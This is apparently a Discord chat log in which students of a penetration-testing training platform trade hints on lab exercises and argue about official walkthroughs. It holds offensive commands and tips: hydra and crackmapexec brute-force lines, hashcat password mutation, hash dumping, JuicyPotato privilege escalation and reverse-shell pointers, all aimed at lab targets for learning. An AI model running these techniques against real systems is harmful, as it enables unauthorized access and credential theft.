#modules
How do you propose it being accessible after doing a skill assessment is the point
I'm not saying they can't do a file or video. But currently, how it's set up, it's not feasible on a large scale
Then dm a staff if you believe the solution to be that simple
I'm curious how it is not feasible to verify that all correct answers were answered on the skill assessment page ^^
@west canopy
The point being the way that it's set up, they would have to add additional code to then have the download be available
And if you got the answer, it shouldn't matter if it's one of the ways it can be done
We pay for the module, it isn't like they sell a service
Of course it matters lol in AD for example it matters

Anyway, it isn't like we have the choice lmao
i haven't found it yet
Hi, I'm stuck on the Nmap (Network Enumeration) firewall, IDS/IPS hard exercise. I was able to find the X port, but can't seem to get the version. Any pointers?
Hello guys, I have a question about this module
When I do the connection, the banner that I receive is different from the real answer. Am I doing something wrong, or is the right answer for the module wrong?
- the banner I get when I connect with nc says XXXXX Debian-5+deb11u1
- the answer expected to be submitted is XXXXX Ubuntu-4ubuntu0.1
I don't remember if it is this question, so take it carefully, but iirc you must look with netcat like it's written somewhere in the module 😉
Tried nc with source port 53 as well but it keeps timing out
Password attacks, Pass the Ticket from Linux. On the svc_workstation question, I got the flag.txt, which seems to have the 'Archive' attribute. How do I read it? I googled around and it says I should be able to use 'vi flag.txt' to see the flag inside. Which I did, but HTB says it is wrong. I tried changing the extension to zip and tar but that didn't work. If I do 'cat flag', I get two unreadable characters added to the flag. So what am I missing here? Also, another question: were you able to get the password for svc_workstation? Because with aes-256, I decided not to even try cracking the password.
you can use smbclient normally and just get the flag file
yes, I did a 'get flag.txt' on the smbclient to download the file. However, I get a couple of extra bytes for the flag.
looks right to me maybe you want to read the task again (especially the part in the brackets)
ok.. I think there is some kind of data stream hidden within the file, [::$DATA], but I am not sure how to look at that. I tried googling 'stream data' and 'data stream' but I am not getting the right info. Is this the right path?
dm me
https://github.com/RyanDodd21/GaTS/tree/main
PrivEsc and Enumeration script/tool downloader for Windows + Linux
thanks a lot
Hey people. I am doing the sqlmap module on the academy (note: I have finished the SQL injection module). Just going through the first exercises. It's quite simple with the tool at hand hehe. My question is: can I get the same result, e.g. find the flag, by including manual SQL injections in the POST request in Burp? Trying to put the results given by sqlmap in the request, and while I receive info I don't see the info I want.
Hello everyone! I am stuck in Skills Assessment I of the AD module. I am trying to connect to the MS01 machine, but I can't. The ping is received but I don't get a response with the Enter-PSSession command. Can anyone give me a hint? Thanks so much
What dot do you mean?
The dot in the message
Does anyone know why ftps directories are empty when you login and do ls but if you use wget -m --no-passive ftp://name:password@ip:port it downloads files?
I'm working on the file upload attacks module. I've used msfvenom to set up my reverse shell. I can use a web shell to see command output and I see the shell uploaded, but when I try to visit the URL [IP:PORT]/uploads/reverse.php to activate it I get /*
do you have read access?
Yes using the same user
Sure, sqlmap just uses different payloads to identify an entry point; you can do the same manually. Now you may have to manually adjust the actual SQL that is being executed, but that shouldn't be so hard once you know how to inject the SQL in the given exercise
I'm on the hard assessment in the password attacks module and I got the administrator hash, but no matter how I use it, it seems like it's wrong. Can someone help me out?
I can't understand what message do you mean. I have the following messages in the server responses. Either "Log in failed with the given credentials." or "500 Internal Server Error" or "<b>Error</b>: Missing xxx parameter". Also "A password reset token was sent to your email address". Can you hint more ?
I don't think you need the admin hash
I mounted the drive and unlocked it on my Linux machine, and after connecting the SAM and SYSTEM I got the administrator hash. I don't really know what else to look for
Exercise link?
once you crack the ||bitlocker|| hash you can just grab it from the vdi right?
hello all
AD Enumeration & Attacks - Skills Assessment Part II
one of the questions is solved by password spraying
i cracked that hash and then mounted the vdi file and inside the vdi file i found the hashes
please give me tips on how to know what password to spray
Isn't the flag in the backup?
appreciate any help 🙂
The question says: flag.txt in C:\Users\Administrator\Desktop\ and I don't see any flag.txt files in the backup, so idk
Try the absolute most common, stupid things it could be. Hint: ||The password is explicitly mentioned in one of the sections as one you can spray||
I must have something messed up in my notes then, I'll take a look at it when I get back to my computer
tried Welcome1 and it is not working
thanks bro that would be amazing
maybe you just haven't enumerated users properly
everything needed to do this is covered in the module
this is the format of my user list "username@inlanefreight.local"
and am doing it via kerbrute
were you able to get through this?
I'm in the footprint hard lab. I got the SSH private key through openssl s_client -connect IP:pop3s, but when I try to connect with ssh, this error appears: Load key "id_rsa": error in libcrypto tom@10.129.57.90: Permission denied (publickey).
Can anyone help me?
Is there a proper app I can edit the .Java files from attacking thick applications in? I get a ton of errors when I try to do it with notepad
And I think it’s because of this shit
It doesn’t work when I try to edit the invoker.Java for downloading the fatty-server.jar, nor does it work with editing the user.java for the sql injection part
Help would be greatly appreciated
Hello I am at the second question of Unconstrained Delegation - Computers. I've done everything as shown in the course, I've also bruteforced the admin hash but I can't get to the Share. I also tried renewing the tickets and restarting the machines. Can you explain where I went wrong?
You don't need to complete it to complete the room
can anyone help me with the hard lab of the footprint module?
What exactly is not working?
Those are properly formatted block comments and shouldn't be an issue. When I did this part (which I hated wholeheartedly) it helped me a lot to just skip it, go on with the module, and come back in the morning
It doesn’t matter if I remove it?
Or not add it when I input code snippets from the module
Neither, they are just comments added by the disassembler
Alright, thanks
oo..this splunk module is a morale killer haha..rough for sure
Have you had a chance to take a look
Compiling the user.java still seems to give me errors
Role seems to be the issue, idk what’s wrong with it though
look up ippsec's video on Fatty
the entire section is a straight rip from part of that box
oh damn..i just noticed you got your CPTS madfox...grats dude...i took a break to do some blue team stuff...back at it now
@thorn urchin with ligolo using responder if I use the tun0 interface it intercepts the ligolo interface as well?
k
Probably not considering LLMNR poisoning wouldn't work over a VPN. The only way I could see responder working over ligolo is setting up something like socat to redirect traffic, but at that point it's really no different than how you would try to do it on something like proxychains
There's a reason tools like Inveigh exist, so you can just run your listener from within the subnet instead of doing weird networking gymnastics
Thank you, saved me from a night of pain
ligolo agents do have some redirection magic, but I haven't experimented with them much beyond figuring out how to double+ pivot with em properly
but the redirection isn't really part of the tuntap setup afaik, pretty sure it's just additional stuff baked into the agent
I dunno, ligolo does some weird stuff most similar tools don't do and the docs only cover the bare basic usage. It def warrants some experimentation
I do know programming but I think I made a dumb error and I can't find it
Source code is actually very interesting (and makes me want to try and rewrite it in Rust), but it looks like, outside of the "gvisor userland network stack" magic, the redirection thing is just basic network I/O
only skimmed code for like 5 mins though
can someone tell me what's wrong there:
http://10.129.149.43:8080/
sudo hydra -L /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-10.txt -f 10.129.149.43 -s 8080 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=<form name='login'"
neither does this work:
sudo hydra -L /opt/useful/SecLists/Usernames/top-usernames-shortlist.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-10.txt -f 10.129.149.43 -s 8080 http-post-form "/j_spring_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"
root:password is correct, but hydra doesn't detect it
I'm on Attacking Active Directory & NTDS.dit. I must "submit John Marston's credentials as the answer. (Format: username:password, Case-Sensitive)". Brute forcing rn with this command: crackmapexec smb 10.129.202.85 -u JMarston -p /home/legomyego/Downloads/rockyou.txt | grep -v "N_FAILURE"
Should I use a different password list?
I'd be more patient, but I keep having to reset the target machine due to connection issues
ATTACKING ENTERPRISE NETWORKS | Port Forwarding Issue
I have used sshuttle and ligolo-ng successfully in Dante and also Zephyr. But for this environment, nothing beyond the jump box of 10.129.x.x can reach back to my attack machine. I can evil-winrm to 172.16.x.x devices only because of sshuttle, but setting up ligolo after that doesn't seem to be working. Anyone have any insight into this or experienced similar?
sometimes egress is simply filtered this way
gotta route back to the jump host to reach your machine
yea I've been using that as a staging for tools, but trying to ssh to the inner domain from my attack box is a no go because of this
ssh is a forward connection, shouldn't matter
unless you're doing some reverse ssh port forwarding stuff
can anyone throw me a hint on the Splunk Module, first lesson/last question "which account had the most 4624's within a 10minute time span"
nah nothing like that
then sounds like you have a different issue
if you have a successful tunnel in, then ssh will work
nvm I got it
Hi guys, I'm on the Windows Fundamentals module and I'm having problems with the "smbclient" command in bash. It outputs the following error:
do_connect: Connection to (target IP) failed (Error NT_STATUS_IO_TIMEOUT)
Which is pretty weird since I used xfreerdp with the same target IP and it connects perfectly. I even configured the SMB permissions on the target. The module tells me this is the output that should print on the screen:
GreyWolf7@htb[/htb]$ smbclient -L IPaddressOfTarget -U htb-student
Enter WORKGROUP\htb-student's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Company Data    Disk
        IPC$            IPC       Remote IPC
smbclient -L lists the fileshares then disconnects
Are you putting 'Company Data' in quotes when connecting?
I don't see anywhere that asks me to type the directory
This is the command: "smbclient -L IPaddressOfTarget -U htb-student"
And it is weird to me that the module shows me the "-L" parameter, which is supposed to be for listing, and then puts a placeholder for an IP
The syntax should be on the page
smbclient //ip/'sharename' -U username
The -L just stands for LIST
When you do -L it does not matter anything else you do, it will list available shares, then immediately disconnect
Any chance someone could help me out with the HARD footprinting lab? I have got the SSH connection under tom, but I am having issues trying to escalate privileges
Can anyone help me?
did you crack it?
Check history
I tried with hashcat using the mutated password list and it said cracked, but where it's supposed to say the password it's just blank, so it's like hash:blank
refresh my memory, was this an ntlm hash by any chance?
Yes, you get the SAM database from the backup and it has an administrator NTLM hash
gotcha, then that means you tried cracking the wrong hash
format is generally Admin:RID:hash:hash:stuff
you want the second hash
There is a file named "my_credentials.txt" in the desktop of the workstation (pwnbox), do I use the credentials stated by that file for the command or do I use the usual "htb-student" username and "Academy_WinFun!" password? (sorry for not attaching any image, I would if I could)
I've never opened up that file in my life
use the explicitly provided credentials when they say to use em
Anyone know how to solve this problem? Load key "id_rsa": error in libcrypto
tom@IP: Permission denied (publickey).
It's in the footprint hard lab
did you set the permissions for id_rsa
Those credentials are for you to remote into
I just did it again on the second hash and it came out the same: (hash):blank
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
DM the full output
Anyone tried to use the EyeWitness software recently? It's used in early sections of the Attacking Common Applications module. With a fresh install of the latest version I cannot get that software to run at all; taking screenshots seems to be broken. It may just not like my computer though. Seeing if anyone else had issues, if you happen to use it.
👍
I copied the SSH private key here
Anyone help me? I've been stuck on this module for 3 hours
sure dm me
They have nothing to do with any module credentials, they are your personal credentials if you were to remote into/or file transfer to the machine
Maybe the format, you can fix with vim %s/\\n/\r/g
Then you can try this ssh connection: ssh -i id_rsa tom@10.10.10.10
hello guys, whom can I send a DM regarding Password Attacks module | Credential Hunting in Linux section
cuz, asking directly from here maybe I can be spoiling...
You can dm me.
Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))
can someone give me the answer to this lol
I've been stuck on it for months and just wanna move on and get a cube, to be honest
You're free to move on, without answering the question. If you've spent months on that one, moving on would not be advised.
Is this from footprint module?
yeh
Dm me, we will figure it out together
its ok. i havent got time rn to be honest. thanks for the offer though. i'll be back soon
Sorry for the wait, but the admin pass should be in your mutated list, just checked it
What happened is when I dumped the hashes from the two files it gave me the wrong hash. I redumped the hashes and this time got a different hash that I was able to crack
Ah, glad you were able to get it, module complete 🎉
Is ssh even open?
So are you running ssh from the remote machine?
Hello friends
I'm confused. My target is 94.237.49.11:38623. My task is to grab the banner, so I do netcat 94.237.49.11 22
Output is SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1 but the answer is SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1. What am I doing wrong?
you were provided a specific ip and port
nvm i figured it out
instead you grabbed the banner of a different port on the host
ty tho
Take another close look at the txt file you found on the way here. Which service runs on port 80 and which service runs on port 443?
And then you just delete your posts? Okay, you can do that.
But then, unfortunately, it doesn't help any other students.
More likely a mod lol
They didn't seem like they were spoiling anything?
the hardest part of the footprinting module was the easy skill assessment because I kept misspelling the user's name 
Mood
genuinely spent about 30-60 mins thinking the username was ciel instead of ceil
Honestly mood
Also fun fact; you're doing the nerfed version of the easy lab
Previously you had to either: use hint, or bruteforce
ew
footprinting
I'm basically doing the CPTS path in reverse 
I've been solving boxes and CTF-ing for a few years now, I'm mostly doing stuff to find holes in my knowledge
so I did Active Directory, Windows Privilege Escalation, and Pivoting first because I knew I wasn't as good as I should be with those
good luck o7
my hint is that bob likes to use weak passwords. I still can't get it
Hello everyone, on the Windows Privilege Escalation Skills Assessment - Part I, when trying privesc with juicy, I receive a "[+] CreateProcessWithTokenW OK" but no reverse shell. I have brute forced all CLSIDs but it's still not working. Can someone help me pls?
Have you found the solution yet?
Does anybody know if it's possible to reset a module's progress in Academy?
I think it's impossible
meh 😦 but thx 🙂
Hello everyone, I'm in ACTIVE DIRECTORY ENUMERATION & ATTACKS, in the Privileged Access section. I'm trying to execute this query in BloodHound: MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2 but this returns NO DATA RETURNED FROM THE QUERY. What am I doing wrong?
Did you manage to get the answer? I've been stuck on that one for a while
INFORMATION GATHERING - WEB EDITION --> Active Subdomain Enumeration -->Submit the number of all "A" records from all zones as the answer.
Anyone that can give me a hint?
Find all zones and count all A Records. I can't give much more hints than that.
Little change in text but clear now. Thanks 🙂
Did you write entries in the log file so that the file is rotated?
There are also log files that do not concern the web server 😉
I am having trouble with question 3 of this module(https://academy.hackthebox.com/module/22/section/342) and not sure what to look for:
"Find the name of an account with a ServicePrincipalName set that is also a member of the Protected Users group. "
```powershell
$protectedUsersGroupName = 'Protected Users'
# Find the account with an SPN set that is also a member of the Protected Users group
$protectedMembers = (Get-ADGroupMember -Identity $protectedUsersGroupName -Recursive).SamAccountName
$account = Get-ADUser -Filter "ServicePrincipalName -like '*'" -Properties SamAccountName, ServicePrincipalName |
    Where-Object { $null -ne $_.ServicePrincipalName -and $protectedMembers -contains $_.SamAccountName }
```
Hey guys.. what's up
quick question pls
How do I clear BloodHound so I can feed new data to it?
Oh! just found it ..
Please, could someone help me with the Windows privesc assessment 1 🙂
To simplify the query, since you are looking for a "group" you can use the Get-ADGroupMember
Hello everyone
I've asked others but so far nobody has been able to get it without brute forcing
Yea, same here. Got it but don't agree it is the correct one. Was hoping that someone understands why. Anyway, thanks! 🙂
Same thing for me, although I spent an hour trying to figure out how that was the correct answer and still had nothing
iirc you nmap and when you find the port of the service you use nc to connect to that port to find the version. I made it a long time ago
Do I need to use the grep command if I need to identify the FQDN of the host whose last octet ends with x.x.x.203? I'm on footprinting > DNS module. I'm stuck on this last question.
I'm currently brute forcing it to find subdomains
I'm still on the Attacking Kerberos module, on the RBCD from Windows part. For some reason, when I use the included PowerView.ps1 script that comes with the machine, I'm unable to perform the exploit
But when I use another version downloaded from my Kali, I can do it
So you have tried to run your shell with all CLSIDs that work? (which is about ||69||)
hint if you are brute forcing the subdomain of the main domain then that's the wrong path
You need to brute force the host of a subdomain
Yes, and many seem to work as they return an OK statement and that it is running as SYSTEM, but no shell received
Guy's, I'm looking for a job opportunity in Cybersecurity related roles can anyone refer me?🙂
Thank you. I got the correct syntax command and answered the last question 🎉
Thanks guys got the correct answer and completed the dns module
yo - https://academy.hackthebox.com/module/51/section/480 I chose to make it more challenging and found a foothold on how to get a shell, but whenever I try to log in to the webpage, I'm logging in and then I'm logged out after 5 sec or so. Is that normal behaviour? I eventually get a shell as www-data but my session keeps disconnecting. Same if I decide to use the SSH credentials provided, I keep getting disconnected from my session.. So is the machine bugging out on me or is this intentional? Resetting the machine doesn't seem to help.
If you have both the Pwnbox and your VPN on at the same time then that could be the issue. No, this isn't intended
Thanks for the reply, I did have Pwnbox and VPN, but I terminated Pwnbox.. I guess I need to wait a bit.
Pls, can I get a quick help on ATTACKING ENTERPRISE NETWORKS ==> Lateral Movement
Can't tell why mimikatz prints ERROR
I don't think that PowerShell console is open as Administrator.
I'm trying to escalate to Administrator.. so I only added my current user to the Administrators group
Can't open PowerShell as Administrator
A sign out and sign in should reflect the changes and allow you to open it as Administrator iirc
Can you try that?
how ?
I'm on a remote session
yeah got it
Oh! yeah.. that worked, so fine
thanks bro
cmd /c
STDOUT:
C:\inetpub\wwwroot\status.inlanefreight.local\files\demo.aspx
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\4308d536\e65a892\demo.aspx.8a26be37.compiled
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\e22c2559\92c7e946\demo.aspx.e75de2f5.compiled
Error
Incorrect answer! ?
q :Where is the Laudanum aspx web shell located on Pwnbox? Submit the full path. (Format: /path/to/laudanum/aspx)
mod:SHELLS & PAYLOADS
cont:Laudanum, One Webshell to Rule Them All
Did you find the path?
🙂
Someone know how to spawn a reverse shell as administrator if I am in the administrators group?
I only have access to winrm
You can assemble a Reverse Shell here.
https://www.revshells.com/
The reverse shell will run with the rights from the user
I have a dumb question on the first footprint lab: is it supposed to be blind or did I just do it wrong?
Hello everyone, for those who did the Password Attacks module / Credential Hunting in Linux, how could you run the crypto tool?
Cuz the tool needs Python 3.9 to work properly but the version running on the machine is 3.8
Did you ||brute force ftp||?
no - "letter" said no aggressive behaviour because "production"
Oh dam, well that's what I did lmao
Hi, would anyone be free to answer a short question on subdomain Enum ?
@cinder cobalt shoot to see if can I help....
Greetings, is there anyone who uses a laptop with a portable monitor? I'd love to hear your feedback and advice.
"[...] it is forbidden to attack the services aggressively using exploits, as these services are in production."
The flavor text is just meant to say no CVEs, as those would all be unintended solutions
Brute forcing is on the table still
A lot of the Windows boxes in Academy are still vulnerable to PrintNightmare and other exploits, so it makes sense
wait, they also give you credentials for that one
yeah there's zero brute forcing on that one
Hi, would anyone be free to answer a short question on subdomain Enum ? (turns out p4 is unavailable rn)
just having an issue with the subdomain enum part of "information gathering" web edition
yoo im stuck again on Attacking Common Services: Skill Assessment - Hard.
I'm fairly sure I'm right at the end. I just have an issue finding the right syntax.
What exactly is not working?
You can write me a DM with the command, then I can probably help you.
alright.
ffuf -w /home/kali/ids.txt:FUZZ -u http://admin.academy.htb:47612/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs 798 . Why isn't this command working?
the port is right
and the ip is already in /etc/hosts
That's a vhost, so you need to add the host flag
I am having a bit of difficulty wrapping my head around the stack alignment for the printf function to work in assembly ... I would appreciate it if someone could explain this to me. Thanks in advance
"Try to analyze the deobfuscated JavaScript code, and understand its main functionality. Once you do, try to replicate what it's doing to get a secret key. What is the key?" I am stuck here
what module, what section
JAVASCRIPT DEOBFUSCATION page 10 (skill assessment )
-H 'Host: host.com' ?
yes
Anyone who has done the Password Attacks module / Credential Hunting in Linux....
Can I send a DM?
sure
No stress.
You can also ask the question here.
I just wanted to show you with the badge how many people have completed the module to answer your question.
Solved, I had to refresh the given IP to get the -X POST result
I don't want to spoil
idk if I can write this here, but I invited a friend to HTB. He completed the introduction module but I still didn't receive any cubes
Support doesn't monitor here - you have to use the help on the site.
What do you guys think is more worth the cubes? Network Enumeration with Nmap or Shells & Payloads
Ok, Houston, I'm stuck. How am I supposed to run the decrypt tool in the Password Attacks module / Credential Hunting in Linux.... IF python3.9 & python2 are not installed on the victim machine?
Depends on what you feel more or less comfortable with. Tbh I'd go for a different module altogether because I think those two are just okay, but it's really up to your needs at the end of the day.
Yeah, I was thinking about that. I think Shells & Payloads will be more useful, since it's 2 days and the network information is easily found on the internet
We do not make writeups or official solution guides publicly available for Academy because 1) they could end up being distributed 2) we prefer having a community based support system.
If you're completely new, and you have to choose between the two, probably do the nmap module.
Whaat up @west canopy
However, I think my favorite modules have been the privilege escalation ones, active directory enumeration and attacks, pivoting, and the attacking enterprise networks ones
I'm not completely new, I know how to work with nmap. The only thing that caught my attention in the nmap module is the Firewall and IDS/IPS Evasion
mainly because those were areas I was weakest in and needed to do some refining, but I also think the lab offerings in those modules are probably some of the best on the platform for how much they cost
There are some really good ones and others sometimes fall flat it feels
IDS IPS Evasion might just be using NULL/FIN/XMAS scan
lab offerings are more useful imo, sadly in my country it's laggy w 300 ping 💀
yes it's a double edged sword. Writeups definitely have their place, and we don't want students to be stuck forever on a single problem. But I think at least on the Academy side, there are quite a few avenues for students to find support.
some academy content itself you can just google or learn elsewhere for free
password attacks was tough but not due to content, it was waiting for the machine to crack the hashes.
I think my weakest area between the shells and nmap is shells, because web shells are still a little harder sometimes
The leak problem is definitely pretty big, but if there was some way I could see an intended route for the more involved skill assessments like active directory enum and attacks, broken authentication, or even shells and payloads, that would be nice. Not as a way to walk you through the solution, but as a way to potentially see a different way of doing it.
I guess the community aspect covers most of that though
@trail leaf I am sure there are those of us that would not mind comparing notes.
yeah, I was mostly just thinking out loud
When I was playing through the CBBH/CPTS modules i tried to document how I solved every problem . And then I would talk to other students and see how they solved it, if it was a different way I would document it and add it to my notes
Cool but doesnt work well
And that's a user problem, the guy bought the module for nothing and will fail his exams... When the missing walkthrough is a problem for the other students who want to verify if he really understood the way he must solve the assessment
In most of the cases exercises are solely based on what you've been taught in the section
Of course, there is the note to not expect everything to be put on the platter for you to copy and paste
True, I find reading the module is like a write-up for most of the labs lol
You are studying for a pen tester role, and for a type writer
At the same time, you can respawn and repeat skill assessments
Yeah, and I will bother other students instead of having an official walkthrough for something I paid for. The support from the community has its limit
Building the thought process is crucial
yep you get access to the labs forever. Also i STILL am discovering new things even in some of our older labs
And what will make you think you will not take the same shortcut etc
If it works...
You are paying for material, not for a writeup
If you have a shortcut then that means you understand it a bit more than what's taught
also --- not that I am trying to upsell you on anything --- if you purchase the Academy Silver Annual plan , you can get 1 on 1 lab guidance from HTB staff
And i paid for a support not for a free student support. That's stupid anyway
that's not how buying things works
You can use the support
I.e. for months the (old) footprinting - easy lab people didn't know how to get the credentials, and had to use the hint. I eventually figured it out. I assume the change was due to not being taught certain tools on the module
But asking here isn't like you're truly bothering anyone, unless you're spamming or pinging random people
If you have paid for support, e.g. you have silver annual check how you can utilize it - https://academy.hackthebox.com/news/7-dec-2022
For the Silver Annual WE haven't all got 300-400€ to put on it. But it isn't about help to solve a lab. Let's take the AD Enumeration and Attacks module, Skills Assessment II: there is some bad shortcut to solve it and the shortcut makes people miss all that the module tries to teach you
OMG i give up with you lmao
If it's an actual issue
Like if it's a shortcut that can be worked around to remove it, the lab will be changed
You can't remove it lmao
How will you remove it
lol finest blue chat
Yeah that's why a walkthrough is needed for the AD at least
lol i am still second guessing myself over the change I made on that one btw 😉
Or, you can do both. The shortcut. And the "intended" way using what's taught
But how does the guy know it is a shortcut xD
If the guy took the module he doesn't know that
good change, but wow ciel (ceil?) is a stupid username 😆
I know that because I do AD pentests; HTB makes it mandatory to pass the cert
It's a good change tbh. It allows the bigger focus on footprinting rather than a brick wall for Google or the hint
let ceil alone!
I honestly didn't get it until after pass attacks and realizing, "there's a tool for that"™️
whats the point of a walk through for a skill assessment???
lol well also that ceil username wasn't even in the provided wordlist on that lab. So for students not using the hint, they would need to just spray wordlists and cross their fingers
You gunna go to client, get stuck, and ask em for a walkthrough on hacking their systems?
If you know a more efficient way, then you know it more
Maybe read what I wrote first... When completed, you have access to a walkthrough to confirm you completed it the intended way and not by taking a shortcut
Not even: the banner on the alt port gives it away
oh true I forgot it did that
So the hints are there like a client answer? Hmm logic
okay I'm gonna need to investigate this LOL
The hints are nudges in the right direction, usually referring to it as "a colleague" or it's general knowledge
Did I say that?
I dont believe I did
so now that we have someone who actually knows: is ceil's ftp supposed to be blind?

hey people for Password Attack Module/Credential Hunting in Linux did you use laZagne or firefox_decrypt?
Did I say we will ask the client for a walkthrough? I don't think so... Still a logic...
it makes no sense having a walkthrough for the skill assessments
what do you mean by blind
What it seemed you were asking for is very much equivalent to that.
That being said, I only walked into the convo seeing you cry about not having walkthroughs. I did not see the original part where you said provide walkthroughs for after module completion.
So I do apologize for that misunderstanding.
It makes no sense to ask for answers for the skill assessment, but you did
having no listing
you are definitely able to list files
It still feels unnecessary however. Labs with unintended paths are extremely rare.
interesting when I did it I always got an empty listing
I will try to reproduce it - Im stuck on hard now anyways 😄
Ohh, that's what you mean, did you try ||ls -al||?
ls -al isn't a supported ftp command, right?
Works for me, just tried it right now
oops
I don't cry lmao, I'm not even concerned by it like the AD module; I do AD pentests daily. But for a learning experience, and after talking to the teens I have in the local "hacker" association, they have doubts they really solved it like they must have, so they are still unsure about their knowledge
maybe I should become a street sweeper instead
I got stuck on the hidden folders too lol
Yes. You need to use it on the target
It is
Have them go through it again and see if they can solve it without their first method
Honestly it's the first I've even heard of the AD module having an unintended path for the skill assessments
yep I know but, my concern is how to use it if the python version is not compatible with the tools?
It should be fine to use python2.7? I don't recall having issues
I dont remember it was incompatible python version
python2.7 is not installed in the victim machine
well the victim machine is running python3.8 and the firefox tool needs python3.9
Is that the error you're getting?
yep
I did already and python2 is not installed in the victim machine
Can you not download a python3.8 version?
I was trying to use Bank retired machine from the 9 free boxes that were supposed to be free for a month. but I couldn't access today
That's not a solution, honestly. Some of them are already limited by time, etc. We do a review in the group, but it is easier to have a walkthrough when completed. The leak problem isn't really one; what prevents me from sharing mine, for example? We even saw the bug bounty path leaked entirely.
#1128623304199110796 or #boxes or contact support
"There's already leaks" isn't really a good argument.
And that sucks about them not having time. This course isn't meant for a teacher to use as their curriculum for a class, it's for self-paced self-study.
If the answers and everything for cbbh are leaked report the site to support
python3.8 is the current version running in the system but, firefox_decrypt need python3.9 to run properly
I think you misunderstood, nobody uses it as a curriculum for their class, they are teens in college, they are 10-14 years old...
@west canopy https://github.com/unode/firefox_decrypt
They have a passion and we are here to animate it and guide them
Okay cool
I just asked for nudge or sanity check when I had tried all and I didn't really know what more to do. And I hadn't seen you told to be able to see the walkthrough after complete it.
As of 1.0.0 it requires 3.9
but how is that relevant to the course?
So you can't ask them for the dedication an adult or older person puts into this passion
Then you do it and create a writeup for them if it's really that important
¯\_(ツ)_/¯
Honestly yeah
Yeah again you ask students to make things people paid for
Gives practice for the exam in the process
Like the support here
You pay for the module, not support
he means u can create the write up
I don't understand getting so upset at wanting the entire structure of the course to be changed to accommodate just your group on one module you have a complaint about
to share it with ur students
You joke, right?
No
No

only one paid tier gets support
well akshually with silver annual, you pay for suppurt
Support here is entirely voluntary
🤓
You have a Real problem with understanding
and that doesnt mean you get walkthroughs, it means a staff member helps you out
They aren't paying for it
this is like free support lol
this is a community channel for community help on Academy please stay on topic
I'm working with your broken English here; please try to be cognizant of the English barrier here, as I have been trying to give your words the benefit of the doubt.
Yeah, free support from a company who sells courses and just has millions in investors lmao
If you think I misunderstood, try explaining again.
support from htb is only on the website through the support chat/tickets
discord is for the community
there is the silver annual support
He cannot use this as support?
which does redirect to getting help from staff on discord
but thats it
no entitlement to walkthroughs
guided mode is for retired boxes i believe
I always used that when I had any problem with the platform
oh you mean the support chat?
Is it a problem with the platform?
he is talking about that no?
No, I just had to talk with them 2 times.
Everyone tries to take the convo without even knowing what the convo was about lmao
@tall saffron End of the day is that staff have seen your request about adding walkthroughs at end of modules. Most of us here disagree with that. Thats that.
once because I couldn't turn off a machine some months ago and they solved it in 10 minutes
And youre getting way too hostile about it to other people
- you want a walk through that's available after you complete the skill assessment
- its a moot point
Lmao
The whole point with academy is to teach you methodologies and develop your problem solving skills, there are labs you can practice whatever you want
People are allowed to disagree with your opinion and suggestion.
and the other one for the coupon of the season 1
lemme try
So before I cry, now I'm hostile xD
If you have solved it in another way, good for you.
I read the first line "as of 1.0.0 python 3.9 is required
Yes
The following mathematical problem 2+2=4 can be solved in many different ways, but does that mean they are wrong?
Cool
Youre getting way too upset at people not agreeing with you.
Its not even a bad suggestion, I just dont agree with it.
4 = 4
2 = 2
0 = 0
No, you have this in mind when written talk isn't good for emotive people like you
but doing a write-up of the skill assessment for your students takes you 30 minutes
^
Im sorry I don't understand what you wrote there, can you rephrase it?
If you didn't understand, read it again 😉
Your English is barely passable and the sentence was completely broken. I'm offering you the chance to clarify.
I downloaded the version shared by you, zipped/uploaded/unzipped it, ran it, and this is the exact error that I'm having:
```
kira@nix01:~/firefox_decrypt$ ./firefox_decrypt.py
Traceback (most recent call last):
  File "./firefox_decrypt.py", line 46, in <module>
    PWStore = list[dict[str, str]]
TypeError: 'type' object is not subscriptable
kira@nix01:~/firefox_decrypt$
```
Weird, I never received complaints and talk English with people daily, so ask questions about yourself
Well, I'm actually a native speaker and had an English major so...
What version of the tool is it?
I'm trying to work with ya here and you're being an ass about it
He is so emotive that he needs to talk about my English
This may be a case of needing to use pwnbox as that probably has the older version compatible
Since the subject was debated... Have a good day/night free workers
emotive emotional
We aren't employed by htb lol.
Good night
That's the whole point of it
let me try
and good luck on your CPTS journey 👍
It will not be a problem with all the previous cert 😉
But the discord is just a community to help each other
the workers are in the main platform
Awesome! Wish ya well.
@west canopy @autumn pilot hey things may be broken if people are installing newer versions of Firefox decrypt as it now requires python >=3.9, and the old version they link requires python 2.x, which isn't installed on target. Pass ATTACK- credential hunting in Linux. Can you verify? (Firefox decrypt version >=1.0.0)
thanks @fathom pendant
I cant reach the target machine in https://academy.hackthebox.com/module/112/section/1066 (FTP). Tried both the pwnbox and my own VM/VPN
Restart the Lab and try again
any tips on the hard nmap-lab?
Hi, can't understand why in windows privesc assessment 1 I get juicypotato working on the target but no reverse shell... Could someone help please?
I get the good message on the target:
```
Testing {8F5DF053-3013-4dd8-B5F4-88214E81C0CF} 1337
......
[+] authresult 0
{8F5DF053-3013-4dd8-B5F4-88214E81C0CF};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
```
idk about the juicy potato. but i have solved this using another method
how ?
feel free to dm
I'm on "Password Attacks - Credential Hunting in Linux." The question is: Examine the target and find out the password of the user Will. Then, submit the password as the answer. Following the hint's advice (at least I think), I have added kira's password to the password.list file given to us in the resources. Then I did:
```
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_pass.list
```
Finally I run the bruteforcer:
```
